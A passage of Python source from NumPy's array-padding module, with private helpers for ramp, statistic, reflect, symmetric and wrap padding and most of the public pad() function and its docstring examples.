return np.concatenate((ramp_arr.astype(arr.dtype), arr), axis=axis)
def _append_ramp(arr, pad_amt, end, axis=-1):
"""
Append linear ramp along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
end : scalar
Constant value to use. For best results should be of type `arr.dtype`;
if not `arr.dtype` will be cast to `arr.dtype`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region ramps linearly from the edge value to `end`.
"""
if pad_amt == 0:
return arr
# Generate shape for final concatenated array
padshape = tuple(x if i != axis else pad_amt
for (i, x) in enumerate(arr.shape))
# Generate an n-dimensional array incrementing along `axis`
ramp_arr = _arange_ndarray(arr, padshape, axis,
reverse=False).astype(np.float64)
# Slice a chunk from the edge to calculate stats on
edge_slice = tuple(slice(None) if i != axis else -1
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract edge, reshape to original rank, and extend along `axis`
edge_pad = arr[edge_slice].reshape(pad_singleton).repeat(pad_amt, axis)
# Linear ramp
slope = (end - edge_pad) / float(pad_amt)
ramp_arr = ramp_arr * slope
ramp_arr += edge_pad
_round_ifneeded(ramp_arr, arr.dtype)
# Ramp values will most likely be float, cast them to the same type as arr
return np.concatenate((arr, ramp_arr.astype(arr.dtype)), axis=axis)
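# Ramp illustration (illustrative; these helpers are normally reached through
# np.pad(..., mode='linear_ramp')):
#
#   a = np.array([1, 2, 3])
#   _append_ramp(a, 3, 0, axis=0)
#   # -> array([1, 2, 3, 2, 1, 0])  (linear ramp from the edge value 3 down to 0)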
def _prepend_max(arr, pad_amt, num, axis=-1):
"""
Prepend `pad_amt` maximum values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
num : int
Depth into `arr` along `axis` to calculate maximum.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
        Output array, with `pad_amt` values prepended along `axis`. The
        prepended region is the maximum of the first `num` values along
        `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _prepend_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
max_slice = tuple(slice(None) if i != axis else slice(num)
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate max, reshape to add singleton dimension back
max_chunk = arr[max_slice].max(axis=axis).reshape(pad_singleton)
# Concatenate `arr` with `max_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((max_chunk.repeat(pad_amt, axis=axis), arr),
axis=axis)
def _append_max(arr, pad_amt, num, axis=-1):
"""
Pad one `axis` of `arr` with the maximum of the last `num` elements.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
num : int
Depth into `arr` along `axis` to calculate maximum.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region is the maximum of the final `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _append_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
end = arr.shape[axis] - 1
if num is not None:
max_slice = tuple(
slice(None) if i != axis else slice(end, end - num, -1)
for (i, x) in enumerate(arr.shape))
else:
max_slice = tuple(slice(None) for x in arr.shape)
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate max, reshape to add singleton dimension back
max_chunk = arr[max_slice].max(axis=axis).reshape(pad_singleton)
# Concatenate `arr` with `max_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((arr, max_chunk.repeat(pad_amt, axis=axis)),
axis=axis)
def _prepend_mean(arr, pad_amt, num, axis=-1):
"""
Prepend `pad_amt` mean values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
num : int
Depth into `arr` along `axis` to calculate mean.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values prepended along `axis`. The
prepended region is the mean of the first `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _prepend_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
mean_slice = tuple(slice(None) if i != axis else slice(num)
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate mean, reshape to add singleton dimension back
mean_chunk = arr[mean_slice].mean(axis).reshape(pad_singleton)
_round_ifneeded(mean_chunk, arr.dtype)
# Concatenate `arr` with `mean_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((mean_chunk.repeat(pad_amt, axis).astype(arr.dtype),
arr), axis=axis)
def _append_mean(arr, pad_amt, num, axis=-1):
"""
Append `pad_amt` mean values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
num : int
Depth into `arr` along `axis` to calculate mean.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
        appended region is the mean of the final `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _append_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
end = arr.shape[axis] - 1
if num is not None:
mean_slice = tuple(
slice(None) if i != axis else slice(end, end - num, -1)
for (i, x) in enumerate(arr.shape))
else:
mean_slice = tuple(slice(None) for x in arr.shape)
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate mean, reshape to add singleton dimension back
mean_chunk = arr[mean_slice].mean(axis=axis).reshape(pad_singleton)
_round_ifneeded(mean_chunk, arr.dtype)
# Concatenate `arr` with `mean_chunk`, extended along `axis` by `pad_amt`
return np.concatenate(
(arr, mean_chunk.repeat(pad_amt, axis).astype(arr.dtype)), axis=axis)
def _prepend_med(arr, pad_amt, num, axis=-1):
"""
Prepend `pad_amt` median values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
num : int
Depth into `arr` along `axis` to calculate median.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values prepended along `axis`. The
prepended region is the median of the first `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _prepend_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
med_slice = tuple(slice(None) if i != axis else slice(num)
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate median, reshape to add singleton dimension back
med_chunk = np.median(arr[med_slice], axis=axis).reshape(pad_singleton)
_round_ifneeded(med_chunk, arr.dtype)
# Concatenate `arr` with `med_chunk`, extended along `axis` by `pad_amt`
return np.concatenate(
(med_chunk.repeat(pad_amt, axis).astype(arr.dtype), arr), axis=axis)
def _append_med(arr, pad_amt, num, axis=-1):
"""
Append `pad_amt` median values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
num : int
Depth into `arr` along `axis` to calculate median.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region is the median of the final `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _append_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
end = arr.shape[axis] - 1
if num is not None:
med_slice = tuple(
slice(None) if i != axis else slice(end, end - num, -1)
for (i, x) in enumerate(arr.shape))
else:
med_slice = tuple(slice(None) for x in arr.shape)
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate median, reshape to add singleton dimension back
med_chunk = np.median(arr[med_slice], axis=axis).reshape(pad_singleton)
_round_ifneeded(med_chunk, arr.dtype)
# Concatenate `arr` with `med_chunk`, extended along `axis` by `pad_amt`
return np.concatenate(
(arr, med_chunk.repeat(pad_amt, axis).astype(arr.dtype)), axis=axis)
def _prepend_min(arr, pad_amt, num, axis=-1):
"""
Prepend `pad_amt` minimum values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
num : int
Depth into `arr` along `axis` to calculate minimum.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values prepended along `axis`. The
prepended region is the minimum of the first `num` values along
`axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _prepend_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
min_slice = tuple(slice(None) if i != axis else slice(num)
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate min, reshape to add singleton dimension back
min_chunk = arr[min_slice].min(axis=axis).reshape(pad_singleton)
# Concatenate `arr` with `min_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((min_chunk.repeat(pad_amt, axis=axis), arr),
axis=axis)
def _append_min(arr, pad_amt, num, axis=-1):
"""
    Append `pad_amt` minimum values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
num : int
Depth into `arr` along `axis` to calculate minimum.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region is the minimum of the final `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _append_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
end = arr.shape[axis] - 1
if num is not None:
min_slice = tuple(
slice(None) if i != axis else slice(end, end - num, -1)
for (i, x) in enumerate(arr.shape))
else:
min_slice = tuple(slice(None) for x in arr.shape)
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate min, reshape to add singleton dimension back
min_chunk = arr[min_slice].min(axis=axis).reshape(pad_singleton)
# Concatenate `arr` with `min_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((arr, min_chunk.repeat(pad_amt, axis=axis)),
axis=axis)
def _pad_ref(arr, pad_amt, method, axis=-1):
"""
Pad `axis` of `arr` by reflection.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : tuple of ints, length 2
Padding to (prepend, append) along `axis`.
method : str
Controls method of reflection; options are 'even' or 'odd'.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt[0]` values prepended and `pad_amt[1]`
values appended along `axis`. Both regions are padded with reflected
values from the original array.
Notes
-----
This algorithm does not pad with repetition, i.e. the edges are not
repeated in the reflection. For that behavior, use `mode='symmetric'`.
The modes 'reflect', 'symmetric', and 'wrap' must be padded with a
single function, lest the indexing tricks in non-integer multiples of the
original shape would violate repetition in the final iteration.
"""
# Implicit booleanness to test for zero (or None) in any scalar type
if pad_amt[0] == 0 and pad_amt[1] == 0:
return arr
##########################################################################
# Prepended region
# Slice off a reverse indexed chunk from near edge to pad `arr` before
ref_slice = tuple(slice(None) if i != axis else slice(pad_amt[0], 0, -1)
for (i, x) in enumerate(arr.shape))
ref_chunk1 = arr[ref_slice]
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
if pad_amt[0] == 1:
ref_chunk1 = ref_chunk1.reshape(pad_singleton)
# Memory/computationally more expensive, only do this if `method='odd'`
if 'odd' in method and pad_amt[0] > 0:
edge_slice1 = tuple(slice(None) if i != axis else 0
for (i, x) in enumerate(arr.shape))
edge_chunk = arr[edge_slice1].reshape(pad_singleton)
ref_chunk1 = 2 * edge_chunk - ref_chunk1
del edge_chunk
##########################################################################
# Appended region
# Slice off a reverse indexed chunk from far edge to pad `arr` after
start = arr.shape[axis] - pad_amt[1] - 1
end = arr.shape[axis] - 1
ref_slice = tuple(slice(None) if i != axis else slice(start, end)
for (i, x) in enumerate(arr.shape))
rev_idx = tuple(slice(None) if i != axis else slice(None, None, -1)
for (i, x) in enumerate(arr.shape))
ref_chunk2 = arr[ref_slice][rev_idx]
if pad_amt[1] == 1:
ref_chunk2 = ref_chunk2.reshape(pad_singleton)
if 'odd' in method:
edge_slice2 = tuple(slice(None) if i != axis else -1
for (i, x) in enumerate(arr.shape))
edge_chunk = arr[edge_slice2].reshape(pad_singleton)
ref_chunk2 = 2 * edge_chunk - ref_chunk2
del edge_chunk
# Concatenate `arr` with both chunks, extending along `axis`
return np.concatenate((ref_chunk1, arr, ref_chunk2), axis=axis)
def _pad_sym(arr, pad_amt, method, axis=-1):
"""
Pad `axis` of `arr` by symmetry.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : tuple of ints, length 2
Padding to (prepend, append) along `axis`.
method : str
Controls method of symmetry; options are 'even' or 'odd'.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt[0]` values prepended and `pad_amt[1]`
values appended along `axis`. Both regions are padded with symmetric
values from the original array.
Notes
-----
This algorithm DOES pad with repetition, i.e. the edges are repeated.
For padding without repeated edges, use `mode='reflect'`.
The modes 'reflect', 'symmetric', and 'wrap' must be padded with a
single function, lest the indexing tricks in non-integer multiples of the
original shape would violate repetition in the final iteration.
"""
# Implicit booleanness to test for zero (or None) in any scalar type
if pad_amt[0] == 0 and pad_amt[1] == 0:
return arr
##########################################################################
# Prepended region
# Slice off a reverse indexed chunk from near edge to pad `arr` before
sym_slice = tuple(slice(None) if i != axis else slice(0, pad_amt[0])
for (i, x) in enumerate(arr.shape))
rev_idx = tuple(slice(None) if i != axis else slice(None, None, -1)
for (i, x) in enumerate(arr.shape))
sym_chunk1 = arr[sym_slice][rev_idx]
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
if pad_amt[0] == 1:
sym_chunk1 = sym_chunk1.reshape(pad_singleton)
# Memory/computationally more expensive, only do this if `method='odd'`
if 'odd' in method and pad_amt[0] > 0:
edge_slice1 = tuple(slice(None) if i != axis else 0
for (i, x) in enumerate(arr.shape))
edge_chunk = arr[edge_slice1].reshape(pad_singleton)
sym_chunk1 = 2 * edge_chunk - sym_chunk1
del edge_chunk
##########################################################################
# Appended region
# Slice off a reverse indexed chunk from far edge to pad `arr` after
start = arr.shape[axis] - pad_amt[1]
end = arr.shape[axis]
sym_slice = tuple(slice(None) if i != axis else slice(start, end)
for (i, x) in enumerate(arr.shape))
sym_chunk2 = arr[sym_slice][rev_idx]
if pad_amt[1] == 1:
sym_chunk2 = sym_chunk2.reshape(pad_singleton)
if 'odd' in method:
edge_slice2 = tuple(slice(None) if i != axis else -1
for (i, x) in enumerate(arr.shape))
edge_chunk = arr[edge_slice2].reshape(pad_singleton)
sym_chunk2 = 2 * edge_chunk - sym_chunk2
del edge_chunk
# Concatenate `arr` with both chunks, extending along `axis`
return np.concatenate((sym_chunk1, arr, sym_chunk2), axis=axis)
def _pad_wrap(arr, pad_amt, axis=-1):
"""
Pad `axis` of `arr` via wrapping.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : tuple of ints, length 2
Padding to (prepend, append) along `axis`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt[0]` values prepended and `pad_amt[1]`
        values appended along `axis`. Both regions are padded with wrapped
        values from the opposite end of `axis`.
Notes
-----
This method of padding is also known as 'tile' or 'tiling'.
The modes 'reflect', 'symmetric', and 'wrap' must be padded with a
single function, lest the indexing tricks in non-integer multiples of the
original shape would violate repetition in the final iteration.
"""
# Implicit booleanness to test for zero (or None) in any scalar type
if pad_amt[0] == 0 and pad_amt[1] == 0:
return arr
##########################################################################
# Prepended region
# Slice off a reverse indexed chunk from near edge to pad `arr` before
start = arr.shape[axis] - pad_amt[0]
end = arr.shape[axis]
wrap_slice = tuple(slice(None) if i != axis else slice(start, end)
for (i, x) in enumerate(arr.shape))
wrap_chunk1 = arr[wrap_slice]
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
if pad_amt[0] == 1:
wrap_chunk1 = wrap_chunk1.reshape(pad_singleton)
##########################################################################
# Appended region
# Slice off a reverse indexed chunk from far edge to pad `arr` after
wrap_slice = tuple(slice(None) if i != axis else slice(0, pad_amt[1])
for (i, x) in enumerate(arr.shape))
wrap_chunk2 = arr[wrap_slice]
if pad_amt[1] == 1:
wrap_chunk2 = wrap_chunk2.reshape(pad_singleton)
# Concatenate `arr` with both chunks, extending along `axis`
return np.concatenate((wrap_chunk1, arr, wrap_chunk2), axis=axis)
def _normalize_shape(ndarray, shape, cast_to_int=True):
"""
Private function which does some checks and normalizes the possibly
much simpler representations of 'pad_width', 'stat_length',
'constant_values', 'end_values'.
Parameters
----------
narray : ndarray
Input ndarray
shape : {sequence, array_like, float, int}, optional
The width of padding (pad_width), the number of elements on the
edge of the narray used for statistics (stat_length), the constant
value(s) to use when filling padded regions (constant_values), or the
endpoint target(s) for linear ramps (end_values).
((before_1, after_1), ... (before_N, after_N)) unique number of
elements for each axis where `N` is rank of `narray`.
((before, after),) yields same before and after constants for each
axis.
(constant,) or val is a shortcut for before = after = constant for
all axes.
cast_to_int : bool, optional
Controls if values in ``shape`` will be rounded and cast to int
before being returned.
Returns
-------
normalized_shape : tuple of tuples
val => ((val, val), (val, val), ...)
[[val1, val2], [val3, val4], ...] => ((val1, val2), (val3, val4), ...)
((val1, val2), (val3, val4), ...) => no change
[[val1, val2], ] => ((val1, val2), (val1, val2), ...)
((val1, val2), ) => ((val1, val2), (val1, val2), ...)
[[val , ], ] => ((val, val), (val, val), ...)
((val , ), ) => ((val, val), (val, val), ...)
"""
ndims = ndarray.ndim
# Shortcut shape=None
if shape is None:
return ((None, None), ) * ndims
# Convert any input `info` to a NumPy array
arr = np.asarray(shape)
# Switch based on what input looks like
if arr.ndim <= 1:
if arr.shape == () or arr.shape == (1,):
# Single scalar input
# Create new array of ones, multiply by the scalar
arr = np.ones((ndims, 2), dtype=ndarray.dtype) * arr
elif arr.shape == (2,):
# Apply padding (before, after) each axis
# Create new axis 0, repeat along it for every axis
arr = arr[np.newaxis, :].repeat(ndims, axis=0)
else:
fmt = "Unable to create correctly shaped tuple from %s"
raise ValueError(fmt % (shape,))
elif arr.ndim == 2:
if arr.shape[1] == 1 and arr.shape[0] == ndims:
# Padded before and after by the same amount
arr = arr.repeat(2, axis=1)
elif arr.shape[0] == ndims:
# Input correctly formatted, pass it on as `arr`
arr = shape
else:
fmt = "Unable to create correctly shaped tuple from %s"
raise ValueError(fmt % (shape,))
else:
fmt = "Unable to create correctly shaped tuple from %s"
raise ValueError(fmt % (shape,))
# Cast if necessary
if cast_to_int is True:
arr = np.round(arr).astype(int)
# Convert list of lists to tuple of tuples
return tuple(tuple(axis) for axis in arr.tolist())
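# Illustrative examples of the normalization above (a sketch, assuming a 2-D
# integer input array `a` and the default cast_to_int=True):
#   _normalize_shape(a, 3)                -> ((3, 3), (3, 3))
#   _normalize_shape(a, (1, 2))           -> ((1, 2), (1, 2))
#   _normalize_shape(a, ((1, 2), (3, 4))) -> ((1, 2), (3, 4))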
def _validate_lengths(narray, number_elements):
"""
Private function which does some checks and reformats pad_width and
stat_length using _normalize_shape.
Parameters
----------
narray : ndarray
Input ndarray
number_elements : {sequence, int}, optional
The width of padding (pad_width) or the number of elements on the edge
of the narray used for statistics (stat_length).
((before_1, after_1), ... (before_N, after_N)) unique number of
elements for each axis.
((before, after),) yields same before and after constants for each
axis.
(constant,) or int is a shortcut for before = after = constant for all
axes.
Returns
-------
_validate_lengths : tuple of tuples
int => ((int, int), (int, int), ...)
[[int1, int2], [int3, int4], ...] => ((int1, int2), (int3, int4), ...)
((int1, int2), (int3, int4), ...) => no change
[[int1, int2], ] => ((int1, int2), (int1, int2), ...)
((int1, int2), ) => ((int1, int2), (int1, int2), ...)
[[int , ], ] => ((int, int), (int, int), ...)
((int , ), ) => ((int, int), (int, int), ...)
"""
normshp = _normalize_shape(narray, number_elements)
for i in normshp:
chk = [1 if x is None else x for x in i]
chk = [1 if x >= 0 else -1 for x in chk]
if (chk[0] < 0) or (chk[1] < 0):
fmt = "%s cannot contain negative values."
raise ValueError(fmt % (number_elements,))
return normshp
###############################################################################
# Public functions
def pad(array, pad_width, mode, **kwargs):
"""
Pads an array.
Parameters
----------
array : array_like of rank N
Input array
pad_width : {sequence, array_like, int}
Number of values padded to the edges of each axis.
((before_1, after_1), ... (before_N, after_N)) unique pad widths
for each axis.
((before, after),) yields same before and after pad for each axis.
(pad,) or int is a shortcut for before = after = pad width for all
axes.
mode : str or function
One of the following string values or a user supplied function.
'constant'
Pads with a constant value.
'edge'
Pads with the edge values of array.
'linear_ramp'
Pads with the linear ramp between end_value and the
array edge value.
'maximum'
Pads with the maximum value of all or part of the
vector along each axis.
'mean'
Pads with the mean value of all or part of the
vector along each axis.
'median'
Pads with the median value of all or part of the
vector along each axis.
'minimum'
Pads with the minimum value of all or part of the
vector along each axis.
'reflect'
Pads with the reflection of the vector mirrored on
the first and last values of the vector along each
axis.
'symmetric'
Pads with the reflection of the vector mirrored
along the edge of the array.
'wrap'
Pads with the wrap of the vector along the axis.
The first values are used to pad the end and the
end values are used to pad the beginning.
<function>
Padding function, see Notes.
stat_length : sequence or int, optional
Used in 'maximum', 'mean', 'median', and 'minimum'. Number of
values at edge of each axis used to calculate the statistic value.
((before_1, after_1), ... (before_N, after_N)) unique statistic
lengths for each axis.
((before, after),) yields same before and after statistic lengths
for each axis.
(stat_length,) or int is a shortcut for before = after = statistic
length for all axes.
Default is ``None``, to use the entire axis.
constant_values : sequence or int, optional
Used in 'constant'. The values to set the padded values for each
axis.
((before_1, after_1), ... (before_N, after_N)) unique pad constants
for each axis.
((before, after),) yields same before and after constants for each
axis.
(constant,) or int is a shortcut for before = after = constant for
all axes.
Default is 0.
end_values : sequence or int, optional
Used in 'linear_ramp'. The values used for the ending value of the
linear_ramp and that will form the edge of the padded array.
((before_1, after_1), ... (before_N, after_N)) unique end values
for each axis.
((before, after),) yields same before and after end values for each
axis.
(constant,) or int is a shortcut for before = after = end value for
all axes.
Default is 0.
reflect_type : {'even', 'odd'}, optional
Used in 'reflect', and 'symmetric'. The 'even' style is the
default with an unaltered reflection around the edge value. For
        the 'odd' style, the extended part of the array is created by
subtracting the reflected values from two times the edge value.
Returns
-------
pad : ndarray
Padded array of rank equal to `array` with shape increased
according to `pad_width`.
Notes
-----
.. versionadded:: 1.7.0
For an array with rank greater than 1, some of the padding of later
axes is calculated from padding of previous axes. This is easiest to
think about with a rank 2 array where the corners of the padded array
are calculated by using padded values from the first axis.
The padding function, if used, should return a rank 1 array equal in
length to the vector argument with padded values replaced. It has the
following signature::
padding_func(vector, iaxis_pad_width, iaxis, **kwargs)
where
vector : ndarray
A rank 1 array already padded with zeros. Padded values are
vector[:pad_tuple[0]] and vector[-pad_tuple[1]:].
iaxis_pad_width : tuple
A 2-tuple of ints, iaxis_pad_width[0] represents the number of
            values padded at the beginning of vector while
iaxis_pad_width[1] represents the number of values padded at
the end of vector.
iaxis : int
The axis currently being calculated.
kwargs : misc
Any keyword arguments the function requires.
Examples
--------
>>> a = [1, 2, 3, 4, 5]
>>> np.lib.pad(a, (2,3), 'constant', constant_values=(4, 6))
array([4, 4, 1, 2, 3, 4, 5, 6, 6, 6])
>>> np.lib.pad(a, (2, 3), 'edge')
array([1, 1, 1, 2, 3, 4, 5, 5, 5, 5])
>>> np.lib.pad(a, (2, 3), 'linear_ramp', end_values=(5, -4))
array([ 5, 3, 1, 2, 3, 4, 5, 2, -1, -4])
>>> np.lib.pad(a, (2,), 'maximum')
array([5, 5, 1, 2, 3, 4, 5, 5, 5])
>>> np.lib.pad(a, (2,), 'mean')
array([3, 3, 1, 2, 3, 4, 5, 3, 3])
>>> np.lib.pad(a, (2,), 'median')
array([3, 3, 1, 2, 3, 4, 5, 3, 3])
>>> a = [[1, 2], [3, 4]]
>>> np.lib.pad(a, ((3, 2), (2, 3)), 'minimum')
array([[1, 1, 1, 2, 1, 1, 1],
[1, 1, 1, 2, 1, 1, 1],
[1, 1, 1, 2, 1, 1, 1],
[1, 1, 1, 2, 1, 1, 1],
[3, 3, 3, 4, 3, 3, 3],
[1, 1, 1, 2, 1, 1, 1],
[1, 1, 1, 2, 1, 1, 1]])
>>> a = [1, 2, 3, 4, 5]
>>> np.lib.pad(a, (2, 3), 'reflect')
array([3, 2, 1, 2, 3, 4, 5, 4, 3, 2])
>>> np.lib.pad(a, (2, 3), 'reflect', reflect_type='odd')
array([-1, 0, 1, 2, 3, 4, 5, 6, 7, 8])
>>> np.lib.pad(a, (2, 3), 'symmetric')
array([2, 1, 1, 2, 3, 4, 5, 5, 4, 3])
>>> np.lib.pad(a, (2, 3), 'symmetric', reflect_type='odd')
array([0, 1, 1, 2, 3, 4, 5, 5, 6, 7])
>>> np.lib.pad(a, (2, 3), 'wrap')
array([4, 5, 1, 2, 3, 4, 5, 1, 2, 3])
>>> def padwithtens(vector, pad_width, iaxis, kwargs):
... vector[:pad_width[0]] = 10
... vector[-pad_width[1]:] = 10
... return vector
>>> a = np.arange(6)
>>> a = a.reshape((2, 3))
>>> np.lib.pad(a, 2, padwithtens)
array([[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 0, 1, 2, 10, 10],
[10, 10, 3, 4, 5, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10]])
"""
if not np.asarray(pad_width).dtype.kind == 'i':
raise TypeError('`pad_width` must be of integral type.')
narray = np.array(array)
pad_width = _validate_lengths(narray, pad_width)
allowedkwargs = {
'constant': ['constant_values'],
'edge': [],
'linear_ramp': ['end_values'],
'maximum': ['stat_length'],
'mean': ['stat_length'],
'median': ['stat_length'],
'minimum': ['stat_length'],
'reflect': ['reflect_type'],
'symmetric': ['reflect_type'],
'wrap': [],
}
kwdefaults = {
'stat_length': None,
'constant_values': 0,
'end_values': 0,
'reflect_type': 'even',
}
if isinstance(mode, str):
        # Make sure we only have allowed kwargs appropriate for this mode
for key in kwargs:
if key not in allowedkwargs[mode]:
raise ValueError('%s keyword not in allowed keywords %s' %
(key, allowedkwargs[mode]))
# Set kwarg defaults
for kw in allowedkwargs[mode]:
kwargs.setdefault(kw, kwdefaults[kw])
# Need to only normalize particular keywords.
for i in kwargs:
if i == 'stat_length':
kwargs[i] = _validate_lengths(narray, kwargs[i])
if i in ['end_values', 'constant_values']:
kwargs[i] = _normalize_shape(narray, kwargs[i],
cast_to_int=False)
else:
# Drop back to old, slower np.apply_along_axis mode for user-supplied
# vector function
function = mode
# Create a new padded array
rank = list(range(len(narray.shape)))
total_dim_increase = [np.sum(pad_width[i]) for i in rank]
offset_slices = [slice(pad_width[i][0],
pad_width[i][0] + narray.shape[i])
for i in rank]
new_shape = np.array(narray.shape) + total_dim_increase
newmat = np.zeros(new_shape, narray.dtype)
# Insert the original array into the padded array
newmat[offset_slices] = narray
# This is the core of pad ...
for iaxis in rank:
np.apply_along_axis(function,
iaxis,
newmat,
pad_width[iaxis],
iaxis,
kwargs)
return newmat
# If we get here, use new padding method
newmat = narray.copy()
# API preserved, but completely new algorithm which pads by building the
# entire block to pad before/after `arr` with in one step, for each axis.
if mode == 'constant':
for axis, ((pad_before, pad_after), (before_val, after_val)) \
in enumerate(zip(pad_width, kwargs['constant_values'])):
newmat = _prepend_const(newmat, pad_before, before_val, axis)
newmat = _append_const(newmat, pad_after, after_val, axis)
elif mode == 'edge':
for axis, (pad_before, pad_after) in enumerate(pad_width):
newmat = _prepend_edge(newmat, pad_before, axis)
newmat = _append_edge(newmat, pad_after, axis)
elif mode == 'linear_ramp':
for axis, ((pad_before, pad_after), (before_val, after_val)) \
in enumerate(zip(pad_width, kwargs['end_values'])):
newmat = _prepend_ramp(newmat, pad_before, before_val, axis)
